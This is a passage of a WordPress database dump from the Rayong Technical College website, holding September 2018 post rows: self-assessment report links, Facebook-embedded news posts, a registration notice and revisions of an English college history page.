'http://www.technicrayong.ac.th/3888-revision-v1/', 0, 'revision', '', 0),
(3890, 3, '2018-09-03 13:20:44', '2018-09-03 06:20:44', '', 'รายงานประเมินตนเอง (SAR) ปีการศึกษา 2560 (1)', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%95%e0%b8%99%e0%b9%80%e0%b8%ad%e0%b8%87-sar-%e0%b8%9b%e0%b8%b5%e0%b8%81-9', '', '', '2018-09-03 13:20:44', '2018-09-03 06:20:44', '', 2871, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2560-1.pdf', 0, 'attachment', 'application/pdf', 0),
(3891, 3, '2018-09-03 13:22:17', '2018-09-03 06:22:17', '<h3><a href=\"/wp-content/uploads/2018/09/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2560-1.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2560 </a></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2559.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2559</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2558.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2558</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2557.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2557</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2556.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2556</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2555.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2555</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2554.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2554</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2553.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2553</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2552.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2552</a></span></h3>', 'รายงานการประเมินตนเอง (SAR)', '', 'inherit', 'closed', 'closed', '', '2871-revision-v1', '', '', '2018-09-03 13:22:17', '2018-09-03 06:22:17', '', 2871, 'http://www.technicrayong.ac.th/2871-revision-v1/', 0, 'revision', '', 0),
(3892, 3, '2018-09-03 13:22:52', '2018-09-03 06:22:52', '<h3><a href=\"/wp-content/uploads/2018/09/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2560-1.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2560</a> <span style=\"color: #ff0000;\">NEW!!</span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2559.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2559</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2558.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2558</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2557.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2557</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2556.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2556</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2555.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2555</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2554.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2554</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2553.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2553</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2552.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2552</a></span></h3>', 'รายงานการประเมินตนเอง (SAR)', '', 'inherit', 'closed', 'closed', '', '2871-revision-v1', '', '', '2018-09-03 13:22:52', '2018-09-03 06:22:52', '', 2871, 'http://www.technicrayong.ac.th/2871-revision-v1/', 0, 'revision', '', 0),
(3893, 3, '2018-09-04 11:37:27', '2018-09-04 04:37:27', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D672775893098602%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ 4 กันยายน 2561 กลุ่มบริษัทโกลว์ ดำเนินธุรกิจผลิตและให้บริการสาธารณูปโภคด้านพลังงาน ได้แก่ ไฟฟ้า ไอน้ำ และน้ำเพื่อการอุตสาหกรรม จำหน่ายให้แก่ไฟฟ้าฝ่ายผลิตแห่งประเทศไทย เข้ามอบรางวัลและประกาศนียบัตรรางวัล \" #ชนะเลิศ\" การประกวดโครงการเครื่องสูบน้ำพลังงานแสงอาทิตย์แบบเคลื่อนที่ ของนักเรียน นักศึกษา สาขาวิชาไฟฟ้า วิทยาลัยเทคนิคระยอง ภายใต้การประกวดโครงการ Glow Hero \"พลังเยาวชน เพื่องสังคมที่ยั่งยืน\" ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b5%e0%b9%88-4-%e0%b8%81%e0%b8%b1%e0%b8%99%e0%b8%a2%e0%b8%b2%e0%b8%a2%e0%b8%99-2561-%e0%b8%81%e0%b8%a5', '', '', '2018-09-04 11:37:27', '2018-09-04 04:37:27', '', 0, 'http://www.technicrayong.ac.th/?p=3893', 313, 'post', '', 0),
(3894, 3, '2018-09-04 11:36:19', '2018-09-04 04:36:19', '', '40684790_672774869765371_4404639285903360_o', '', 'inherit', 'closed', 'closed', '', '40684790_672774869765371_4404639285903360_o', '', '', '2018-09-04 11:36:19', '2018-09-04 04:36:19', '', 3893, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/40684790_672774869765371_4404639285903360_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3895, 3, '2018-09-04 11:37:27', '2018-09-04 04:37:27', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D672775893098602%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ 4 กันยายน 2561 กลุ่มบริษัทโกลว์ ดำเนินธุรกิจผลิตและให้บริการสาธารณูปโภคด้านพลังงาน ได้แก่ ไฟฟ้า ไอน้ำ และน้ำเพื่อการอุตสาหกรรม จำหน่ายให้แก่ไฟฟ้าฝ่ายผลิตแห่งประเทศไทย เข้ามอบรางวัลและประกาศนียบัตรรางวัล \" #ชนะเลิศ\" การประกวดโครงการเครื่องสูบน้ำพลังงานแสงอาทิตย์แบบเคลื่อนที่ ของนักเรียน นักศึกษา สาขาวิชาไฟฟ้า วิทยาลัยเทคนิคระยอง ภายใต้การประกวดโครงการ Glow Hero \"พลังเยาวชน เพื่องสังคมที่ยั่งยืน\" ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3893-revision-v1', '', '', '2018-09-04 11:37:27', '2018-09-04 04:37:27', '', 3893, 'http://www.technicrayong.ac.th/3893-revision-v1/', 0, 'revision', '', 0),
(3896, 3, '2018-09-04 13:26:59', '2018-09-04 06:26:59', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F09%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ การลงทะเบียนเรียน ประจำภาคเรียนที่ 2/2561', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a5%e0%b8%87%e0%b8%97%e0%b8%b0%e0%b9%80%e0%b8%9a%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b9%80%e0%b8%a3%e0%b8%b5-2', '', '', '2018-09-04 13:26:59', '2018-09-04 06:26:59', '', 0, 'http://www.technicrayong.ac.th/?p=3896', 312, 'post', '', 0),
(3897, 3, '2018-09-04 13:26:34', '2018-09-04 06:26:34', '', 'ประกาศ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8', '', '', '2018-09-04 13:26:34', '2018-09-04 06:26:34', '', 3896, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/ประกาศ.pdf', 0, 'attachment', 'application/pdf', 0),
(3898, 3, '2018-09-04 13:26:59', '2018-09-04 06:26:59', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F09%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ การลงทะเบียนเรียน ประจำภาคเรียนที่ 2/2561', '', 'inherit', 'closed', 'closed', '', '3896-revision-v1', '', '', '2018-09-04 13:26:59', '2018-09-04 06:26:59', '', 3896, 'http://www.technicrayong.ac.th/3896-revision-v1/', 0, 'revision', '', 0),
(3899, 3, '2018-09-07 09:47:10', '2018-09-07 02:47:10', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><span style=\"color: #808080;\"><strong>Rayong Technical College Background </strong></span></h2>\r\n<h4><span style=\"color: #808080;\"><strong>Located </strong>086/13, Taksin Maharach Rd, Tapradoo Sub-district,</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Muang District, Rayong, Thailand 21000</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Tel: 038-611-160, 038-611-192 Fax: 038-970-717</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>The area of 122,468 sqm. (76 rai 2 ngan 17 sqw.)</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> on the 3<sup>rd </sup>of October 1938 the Department of Vocational Education worked side by side with Rayong province to establish \"Chang Mai Rayong School” (Carpentry School). First the students studied on an empty lot in an unused sermon hall in the monastery of “Wat Keng”. This was a temporary place of study. Rayong hospital is now situated on the grounds that held “wat Keng\" Later the school received a generous donation of 8,000 sqm (5 rai) of land from Mr. Lieng Piempongsan. This was used to establish a place of education in a sub district of Rayong. To this day it remains the site and place of learning that is Rayong Technical College.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> in 1958 the school bought additional land of 8,000 sqm (5 rai) and got approved for a name change to “Karn Chang Mai Rayong School”. In 1966 The Ministry of Education affirmed that “Karn Chang Mai Rayong School” and “Karn Chang Satree Rayong” would be combined and become known as “ Karn Chang Rayong School” . On the </span><span style=\"color: #808080;\">1<sup>st </sup></span><span style=\"color: #808080;\">of October 1977 the school was upgraded to “Rayong Technical School”. Then on the 1st of May 1980 the school was elevated to what we know it as today \"Rayong Technical College\"</span></h4>\r\n<h3></h3>', 'The College Background', '', 'inherit', 'closed', 'closed', '', '3626-revision-v1', '', '', '2018-09-07 09:47:10', '2018-09-07 02:47:10', '', 3626, 'http://www.technicrayong.ac.th/3626-revision-v1/', 0, 'revision', '', 0),
(3900, 3, '2018-09-07 09:48:55', '2018-09-07 02:48:55', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><span style=\"color: #808080;\"><strong>Rayong Technical College Background </strong></span></h2>\r\n<h4><span style=\"color: #808080;\"><strong>Located </strong>086/13, Taksin Maharach Rd, Tapradoo Sub-district,</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Muang District, Rayong, Thailand 21000</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Tel: 038-611-160, 038-611-192 Fax: 038-970-717</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>The area of 122,468 sqm. (76 rai 2 ngan 17 sqw.)</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> on the 3rd<sup> </sup>of October 1938 the Department of Vocational Education worked side by side with Rayong province to establish \"Chang Mai Rayong School” (Carpentry School). First the students studied on an empty lot in an unused sermon hall in the monastery of “Wat Keng”. This was a temporary place of study. Rayong hospital is now situated on the grounds that held “wat Keng\" Later the school received a generous donation of 8,000 sqm (5 rai) of land from Mr. Lieng Piempongsan. This was used to establish a place of education in a sub district of Rayong. To this day it remains the site and place of learning that is Rayong Technical College.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> in 1958 the school bought additional land of 8,000 sqm (5 rai) and got approved for a name change to “Karn Chang Mai Rayong School”. In 1966 The Ministry of Education affirmed that “Karn Chang Mai Rayong School” and “Karn Chang Satree Rayong” would be combined and become known as “ Karn Chang Rayong School” . On the </span><span style=\"color: #808080;\">1st<sup> </sup></span><span style=\"color: #808080;\">of October 1977 the school was upgraded to “Rayong Technical School”. Then on the 1st of May 1980 the school was elevated to what we know it as today \"Rayong Technical College\"</span></h4>\r\n<h3></h3>', 'The College Background', '', 'inherit', 'closed', 'closed', '', '3626-revision-v1', '', '', '2018-09-07 09:48:55', '2018-09-07 02:48:55', '', 3626, 'http://www.technicrayong.ac.th/3626-revision-v1/', 0, 'revision', '', 0),
(3901, 3, '2018-09-10 11:14:37', '2018-09-10 04:14:37', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><span style=\"color: #808080;\"><strong>Rayong Technical College Background </strong></span></h2>\r\n<h4><span style=\"color: #808080;\"><strong>Located </strong>086/13, Taksin Maharach Rd, Tapradoo Sub-district,</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Muang District, Rayong, Thailand 21000</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Tel: 038-611-160, 038-611-192 Fax: 038-970-717</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>The area of 122,468 sqm. (76 rai 2 ngan 17 sqw.)</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> on the 3rd<sup> </sup>of October 1938 the Department of Vocational Education worked side by side with Rayong province to establish \"Chang Mai Rayong School” (Carpentry School). First the students studied on an empty lot in an unused sermon hall in the monastery of “Wat Keng”. This was a temporary place of study. Rayong hospital is now situated on the grounds that held “wat Keng\" Later the school received a generous donation of 8,000 sqm (5 rai) of land from Mr. Lieng Piempongsan. This was used to establish a place of education in a sub district of Rayong. To this day it remains the site and place of learning that is Rayong Technical College.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> in 1958 the school bought additional land of 8,000 sqm (5 rai) and got approved for a name change to “Karn Chang Mai Rayong School”. In 1966 The Ministry of Education affirmed that “Karn Chang Mai Rayong School” and “Karn Chang Satree Rayong” would be combined and become known as “ Karn Chang Rayong School” . On the </span><span style=\"color: #808080;\">1st<sup> </sup></span><span style=\"color: #808080;\">of October 1977 the school was upgraded to “Rayong Technical School”. Then on the 1st of May 1980 the school was elevated to what we know it as today \"Rayong Technical College\"</span></h4>\r\n<h4><strong><span style=\"color: #808080;\">Education Management </span></strong></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1938</strong> was the beginning of the vocational education and training for 3-year course for grade 4 graduates to study in the carpentry department. The first generation totaled 34 students. </span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1942</strong> the Hairdresser department opened providing a 2-year course, later this was cancelled due to the lack of students.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1949</strong> the Hairdresser department was reopened and 3 more classrooms were built for 1st year students of carpentry. </span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1950</strong> the Hairdresser department was shut down for the second time.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1953</strong> Education expansion for senior high school graduates, vocational junior high school graduates and grade 9 to enter the 3-year carpentry course. </span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1957</strong> a course to study to be a mechanic opened up for vocational senior high school graduates.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1960</strong> a course to study to be carpentry opened up for high vocational education graduates and the mechanic department was cancelled.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1963</strong> the mechanic department opened for the second time and a vocational education construction department also opened up to grade 10-12.</span></h4>', 'The College Background', '', 'inherit', 'closed', 'closed', '', '3626-revision-v1', '', '', '2018-09-10 11:14:37', '2018-09-10 04:14:37', '', 3626, 'http://www.technicrayong.ac.th/3626-revision-v1/', 0, 'revision', '', 0),
(3902, 3, '2018-09-10 11:16:55', '2018-09-10 04:16:55', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><span style=\"color: #808080;\"><strong>Rayong Technical College Background </strong></span></h2>\r\n<h4><span style=\"color: #808080;\"><strong>Located </strong>086/13, Taksin Maharach Rd, Tapradoo Sub-district,</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Muang District, Rayong, Thailand 21000</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Tel: 038-611-160, 038-611-192 Fax: 038-970-717</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>The area of 122,468 sqm. (76 rai 2 ngan 17 sqw.)</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> on the 3rd<sup> </sup>of October 1938 the Department of Vocational Education worked side by side with Rayong province to establish \"Chang Mai Rayong School” (Carpentry School). First the students studied on an empty lot in an unused sermon hall in the monastery of “Wat Keng”. This was a temporary place of study. Rayong hospital is now situated on the grounds that held “wat Keng\" Later the school received a generous donation of 8,000 sqm (5 rai) of land from Mr. Lieng Piempongsan. This was used to establish a place of education in a sub district of Rayong. To this day it remains the site and place of learning that is Rayong Technical College.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> in 1958 the school bought additional land of 8,000 sqm (5 rai) and got approved for a name change to “Karn Chang Mai Rayong School”. In 1966 The Ministry of Education affirmed that “Karn Chang Mai Rayong School” and “Karn Chang Satree Rayong” would be combined and become known as “ Karn Chang Rayong School” . On the </span><span style=\"color: #808080;\">1st<sup> </sup></span><span style=\"color: #808080;\">of October 1977 the school was upgraded to “Rayong Technical School”. Then on the 1st of May 1980 the school was elevated to what we know it as today \"Rayong Technical College\"</span></h4>\r\n<h4></h4>\r\n<h2><strong><span style=\"color: #808080;\">Education Management </span></strong></h2>\r\n<h4><span style=\"color: #808080;\"><strong>In 1938</strong> was the beginning of the vocational education and training for 3-year course for grade 4 graduates to study in the carpentry department. The first generation totaled 34 students. </span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1942</strong> the Hairdresser department opened providing a 2-year course, later this was cancelled due to the lack of students.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1949</strong> the Hairdresser department was reopened and 3 more classrooms were built for 1st year students of carpentry. </span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1950</strong> the Hairdresser department was shut down for the second time.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1953</strong> Education expansion for senior high school graduates, vocational junior high school graduates and grade 9 to enter the 3-year carpentry course. </span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1957</strong> a course to study to be a mechanic opened up for vocational senior high school graduates.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1960</strong> a course to study to be carpentry opened up for high vocational education graduates and the mechanic department was cancelled.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1963</strong> the mechanic department opened for the second time and a vocational education construction department also opened up to grade 10-12.</span></h4>', 'The College Background', '', 'inherit', 'closed', 'closed', '', '3626-revision-v1', '', '', '2018-09-10 11:16:55', '2018-09-10 04:16:55', '', 3626, 'http://www.technicrayong.ac.th/3626-revision-v1/', 0, 'revision', '', 0),
(3903, 3, '2018-09-10 11:20:17', '2018-09-10 04:20:17', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><span style=\"color: #808080;\"><strong>Rayong Technical College Background </strong></span></h2>\r\n<h4><span style=\"color: #808080;\"><strong>Located </strong>086/13, Taksin Maharach Rd, Tapradoo Sub-district,</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Muang District, Rayong, Thailand 21000</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Tel: 038-611-160, 038-611-192 Fax: 038-970-717</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>The area of 122,468 sqm. (76 rai 2 ngan 17 sqw.)</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> on the 3rd<sup> </sup>of October 1938 the Department of Vocational Education worked side by side with Rayong province to establish \"Chang Mai Rayong School” (Carpentry School). First the students studied on an empty lot in an unused sermon hall in the monastery of “Wat Keng”. This was a temporary place of study. Rayong hospital is now situated on the grounds that held “wat Keng\" Later the school received a generous donation of 8,000 sqm (5 rai) of land from Mr. Lieng Piempongsan. This was used to establish a place of education in a sub district of Rayong. To this day it remains the site and place of learning that is Rayong Technical College.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> in 1958 the school bought additional land of 8,000 sqm (5 rai) and got approved for a name change to “Karn Chang Mai Rayong School”. In 1966 The Ministry of Education affirmed that “Karn Chang Mai Rayong School” and “Karn Chang Satree Rayong” would be combined and become known as “ Karn Chang Rayong School” . On the </span><span style=\"color: #808080;\">1st<sup> </sup></span><span style=\"color: #808080;\">of October 1977 the school was upgraded to “Rayong Technical School”. Then on the 1st of May 1980 the school was elevated to what we know it as today \"Rayong Technical College\"</span></h4>\r\n<h2><strong><span style=\"color: #808080;\">Education Management </span></strong></h2>\r\n<h4><span style=\"color: #808080;\"><strong>In 1938</strong> was the beginning of the vocational education and training for 3-year course for grade 4 graduates to study in the carpentry department. The first generation totaled 34 students. </span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1942</strong> the Hairdresser department opened providing a 2-year course, later this was cancelled due to the lack of students.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1949</strong> the Hairdresser department was reopened and 3 more classrooms were built for 1st year students of carpentry. </span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1950</strong> the Hairdresser department was shut down for the second time.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1953</strong> Education expansion for senior high school graduates, vocational junior high school graduates and grade 9 to enter the 3-year carpentry course. </span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1957</strong> a course to study to be a mechanic opened up for vocational senior high school graduates.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1960</strong> a course to study to be carpentry opened up for high vocational education graduates and the mechanic department was cancelled.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1963</strong> the mechanic department opened for the second time and a vocational education construction department also opened up to grade 10-12.</span></h4>', 'The College Background', '', 'inherit', 'closed', 'closed', '', '3626-revision-v1', '', '', '2018-09-10 11:20:17', '2018-09-10 04:20:17', '', 3626, 'http://www.technicrayong.ac.th/3626-revision-v1/', 0, 'revision', '', 0),
(3904, 3, '2018-09-10 13:09:47', '2018-09-10 06:09:47', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D674235639619294%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ยินดีต้อนรับ ท่านพงษ์พิศาล ชินสำราญ ศึกษาธิการจังหวัดปราจีนบุรี ท่านนพรัตน์ เทพตะขบ รองศึกษาธิการจังหวัดปราจีนบุรี คณะบุคลากร จากสำนักงานศึกษาธิการจังหวัดปราจีนบุรี เข้าศึกษาดูงานศูนย์ประสานงานการผลิตและพัฒนากำลังคนอาชีวศึกษา เขตพัฒนาพิเศษภาคตะวันออก จังหวัดระยอง ภายใต้โครงการพัฒนาประสิทธิภาพข้าราชการสำนักงานศึกษาธิการจังหวัดปราจีน', '', 'publish', 'closed', 'open', '', '%e0%b8%a2%e0%b8%b4%e0%b8%99%e0%b8%94%e0%b8%b5%e0%b8%95%e0%b9%89%e0%b8%ad%e0%b8%99%e0%b8%a3%e0%b8%b1%e0%b8%9a-%e0%b8%97%e0%b9%88%e0%b8%b2%e0%b8%99%e0%b8%9e%e0%b8%87%e0%b8%a9%e0%b9%8c%e0%b8%9e%e0%b8%b4', '', '', '2018-09-10 13:11:10', '2018-09-10 06:11:10', '', 0, 'http://www.technicrayong.ac.th/?p=3904', 311, 'post', '', 0),
(3906, 3, '2018-09-10 13:09:47', '2018-09-10 06:09:47', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D674235639619294%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ยินดีต้อนรับ ท่านพงษ์พิศาล ชินสำราญ ศึกษาธิการจังหวัดปราจีนบุรี ท่านนพรัตน์ เทพตะขบ รองศึกษาธิการจังหวัดปราจีนบุรี คณะบุคลากร จากสำนักงานศึกษาธิการจังหวัดปราจีนบุรี เข้าศึกษาดูงานศูนย์ประสานงานการผลิตและพัฒนากำลังคนอาชีวศึกษา เขตพัฒนาพิเศษภาคตะวันออก จังหวัดระยอง ภายใต้โครงการพัฒนาประสิทธิภาพข้าราชการสำนักงานศึกษาธิการจังหวัดปราจีน', '', 'inherit', 'closed', 'closed', '', '3904-revision-v1', '', '', '2018-09-10 13:09:47', '2018-09-10 06:09:47', '', 3904, 'http://www.technicrayong.ac.th/3904-revision-v1/', 0, 'revision', '', 0),
(3907, 3, '2018-09-10 13:10:55', '2018-09-10 06:10:55', '', '41061135_674229656286559_6379855334713851904_o', '', 'inherit', 'closed', 'closed', '', '41061135_674229656286559_6379855334713851904_o', '', '', '2018-09-10 13:10:55', '2018-09-10 06:10:55', '', 3904, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/41061135_674229656286559_6379855334713851904_o.jpg', 0, 'attachment', 'image/jpeg', 0),
